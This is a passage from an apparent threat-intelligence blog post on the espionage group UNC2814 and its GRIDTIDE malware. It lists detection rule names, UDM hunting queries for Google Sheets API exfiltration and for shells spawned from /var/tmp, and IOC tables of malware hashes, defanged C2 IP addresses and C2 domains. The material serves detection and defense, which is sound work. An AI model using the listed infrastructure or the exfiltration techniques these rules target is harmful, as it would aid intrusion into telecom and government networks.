</li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Victim Notifications: GTIG has issued formal victim notifications and is actively supporting organizations with verified compromises resulting from this threat.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Detection Signatures: We have refined and implemented a variety of signatures and signals designed to neutralize UNC2814 operations and intercept malware linked to GRIDTIDE.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">IOC Release: We are publicly releasing a collection of IOC’s related to UNC2814 infrastructure that the group has used since at least 2023 to help organizations identify this activity in their networks and better protect customers and organizations around the world.</span></p> </li> </ul> <h3><span style="vertical-align: baseline;">Conclusion</span></h3> <p><span style="vertical-align: baseline;">The global scope of UNC2814’s activity, evidenced by confirmed or suspected operations in over 70 countries, underscores the serious threat facing telecommunications and government sectors, and the capacity for these intrusions to evade detection by defenders. Prolific intrusions of this scale are generally the result of years of focused effort and will not be easily re-established. We expect that UNC2814 will work hard to re-establish their global footprint.</span></p> <h3><span style="vertical-align: baseline;">Detection Through Google Security Operations</span></h3> <p><span style="vertical-align: baseline;">Google SecOps customers have access to these broad category rules and more under the </span><span style="vertical-align: baseline;">Mandiant Hunting</span><span style="vertical-align: baseline;"> rule pack. The activity discussed in the blog post is detected in Google SecOps under the rule names:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Suspicious Shell Execution From Var Directory</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Suspicious Sensitive File Access Via SSH</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Config File Staging in Sensitive Directories</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Shell Spawning Curl Archive Downloads from IP</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Numeric Permission Profiling in System Paths</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Sudo Shell Spawning Reconnaissance Tools</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Potential Google Sheets API Data Exfiltration</span></p> </li> </ul> <h4><span style="vertical-align: baseline;">SecOps Hunting Queries</span></h4> <p><span style="vertical-align: baseline;">The following UDM queries can be used to identify potential compromises within your environment.</span></p> <h5><span style="vertical-align: baseline;">Suspicious Google Sheets API Connections</span></h5> <p><span style="vertical-align: baseline;">Search for a non-browser process initiating outbound HTTPS requests to specific Google Sheets URIs leveraged by GRIDTIDE.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>target.url = /sheets\.googleapis\.com/ ( target.url = /batchClear/ OR target.url = /batchUpdate/ OR target.url = /valueRenderOption=FORMULA/ ) principal.process.file.full_path != /chrome|firefox|safari|msedge/</code></pre></div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">Config File Creation in Suspicious Directory</span></h5> <p><span style="vertical-align: baseline;">Identify configuration files being created at, modified, or moved to unexpected locations.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>( metadata.event_type = "FILE_CREATION" OR metadata.event_type = "FILE_MODIFICATION" OR metadata.event_type = "FILE_MOVE" ) AND target.file.full_path = /^(\/usr\/sbin|\/sbin|\/var\/tmp)\/[^\\\/]+\.cfg$/ nocase</code></pre></div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">Suspicious Shell Execution from /var/tmp/</span></h5> <p><span style="vertical-align: baseline;">Detects executables with short alphanumeric filenames, launching from the </span><span style="vertical-align: baseline;">/var/tmp/</span><span style="vertical-align: baseline;"> directory, and spawning a shell.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>principal.process.file.full_path = /^\/var\/tmp\/[a-z0-9]{1,10}$/ nocase AND target.process.file.full_path = /\b(ba)?sh$/ nocase</code></pre></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Indicators of Compromise (IOCs)</span></h3> <p><span style="vertical-align: baseline;">The following IOCs are available in a free Google Threat Intelligence (GTI) </span><a href="https://www.virustotal.com/gui/collection/d0acdcacc1fec8a9673d037ecc413c215d238f6fbf53247add30c8a58f275e3d/summary" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">collection</span></a><span style="vertical-align: baseline;"> for registered users.</span></p> <h4>Host-Based Artifacts</h4></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Artifact</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Hash (SHA256)</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">xapt</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">GRIDTIDE</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">ce36a5fc44cbd7de947130b67be9e732a7b4086fb1df98a5afd724087c973b47</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">xapt.cfg</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Key file used by GRIDTIDE to decrypt its Google Drive configuration.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">01fc3bd5a78cd59255a867ffb3dfdd6e0b7713ee90098ea96cc01c640c6495eb</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">xapt.service</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Malicious </span><code style="vertical-align: baseline;">systemd</code><span style="vertical-align: baseline;"> service file created for GRIDTIDE persistence.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">eb08c840f4c95e2fa5eff05e5f922f86c766f5368a63476f046b2b9dbffc2033</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">hamcore.se2</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SoftEtherVPN Bridge component.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">4eb994b816a1a24cf97bfd7551d00fe14b810859170dbf15180d39e05cd7c0f9</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">fire</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SoftEtherVPN Bridge component (renamed from </span><code style="vertical-align: baseline;">vmlog</code><span style="vertical-align: baseline;">). Extracted from </span><code style="vertical-align: baseline;">update.tar.gz</code><span style="vertical-align: baseline;">.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">4eb994b816a1a24cf97bfd7551d00fe14b810859170dbf15180d39e05cd7c0f9</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">vpn_bridge.config</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SoftEtherVPN Bridge configuration.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">669917bad46a57e5f2de037f8ec200a44fb579d723af3e2f1be1e8479a267966</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">apt.tar.gz</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Archive downloaded from </span><code style="vertical-align: baseline;">130.94.6[.]228</code><span style="vertical-align: baseline;">. Contained GRIDTIDE.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">N/A</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">update.tar.gz</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Additional archive downloaded. Contained </span><code style="vertical-align: baseline;">vmlog</code><span style="vertical-align: baseline;"> </span><span style="vertical-align: baseline;">(renamed to</span><span style="vertical-align: baseline;"> </span><code style="vertical-align: baseline;">fire</code><span style="vertical-align: baseline;">), a SoftEtherVPN Bridge component.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">N/A</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">amp.tar.gz</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Additional archive downloaded. Contained </span><code style="vertical-align: baseline;">hamcore.se2</code><span style="vertical-align: baseline;">, a SoftEtherVPN Bridge component.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">N/A</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">pmp</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">GRIDTIDE variant.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">N/A</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">pmp.cfg</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">GRIDTIDE variant key file.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">N/A</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h4>Network-Based Artifacts</h4></div> <div class="block-paragraph_advanced"><div align="center"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Type</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Artifact</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">IP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 server hosting </span><code style="vertical-align: baseline;">apt.tar.gz</code><span style="vertical-align: baseline;">, </span><code style="vertical-align: baseline;">update.tar.g</code><span style="vertical-align: baseline;">z</span><span style="vertical-align: baseline;">, and </span><code style="vertical-align: baseline;">amp.tar.gz</code><span style="vertical-align: baseline;">.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">130[.]94[.]6[.]228</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">IP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Target of a </span><code style="vertical-align: baseline;">curl -ik</code><span style="vertical-align: baseline;"> command to verify HTTPS access to their infrastructure.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">38[.]180[.]205[.]14</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">IP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Threat actor’s SoftEtherVPN server.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">38[.]60[.]194[.]21</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">IP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Attacker IP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">38[.]54[.]112[.]184</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">IP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Attacker IP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">38[.]60[.]171[.]242</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">IP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Attacker IP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">195[.]123[.]211[.]70</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">IP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Attacker IP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">202[.]59[.]10[.]122</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">IP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Hosting malicious C2 domain.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">38[.]60[.]252[.]66</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">IP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Hosting malicious C2 domain.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">45[.]76[.]184[.]214</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">IP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Hosting malicious C2 domain.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">45[.]90[.]59[.]129</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">IP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Hosting malicious C2 domain.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">195[.]123[.]226[.]235</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">IP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Hosting malicious C2 domain.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">65[.]20[.]104[.]91</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">IP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Hosting malicious C2 domain.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">5[.]34[.]176[.]6</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">IP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Hosting malicious C2 domain.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">139[.]84[.]236[.]237</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">IP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Hosting malicious C2 domain.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">149[.]28[.]128[.]128</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">IP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Hosting malicious C2 domain.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">38[.]54[.]31[.]146</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">IP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Hosting malicious C2 domain.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">178[.]79[.]188[.]181</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">IP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Hosting malicious C2 domain.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">38[.]54[.]37[.]196</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">IP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SoftEtherVPN server.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">207[.]148[.]73[.]18</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">IP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SoftEtherVPN server.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">38[.]60[.]224[.]25</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">IP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SoftEtherVPN server.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">149[.]28[.]139[.]125</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">IP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SoftEtherVPN server.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">38[.]54[.]32[.]244</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">IP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SoftEtherVPN server.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">38[.]54[.]82[.]69</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">IP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SoftEtherVPN server.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">45[.]76[.]157[.]113</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">IP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SoftEtherVPN server.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">45[.]77[.]254[.]168</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">IP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SoftEtherVPN server.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">139[.]180[.]219[.]115</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">User-Agent</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">GRIDTIDE User-Agent string.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">Directory API Google-API-Java-Client/2.0.0 Google-HTTP-Java-Client/1.42.3 (gzip)</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">User-Agent</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">GRIDTIDE User-Agent string.</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">Google-HTTP-Java-Client/1.42.3 (gzip)</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">1cv2f3d5s6a9w[.]ddnsfree[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">admina[.]freeddns[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">afsaces[.]accesscam[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">ancisesic[.]accesscam[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">applebox[.]camdvr[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">appler[.]kozow[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">asdad21ww[.]freeddns[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">aw2o25forsbc[.]camdvr[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">awcc001jdaigfwdagdcew[.]giize[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> 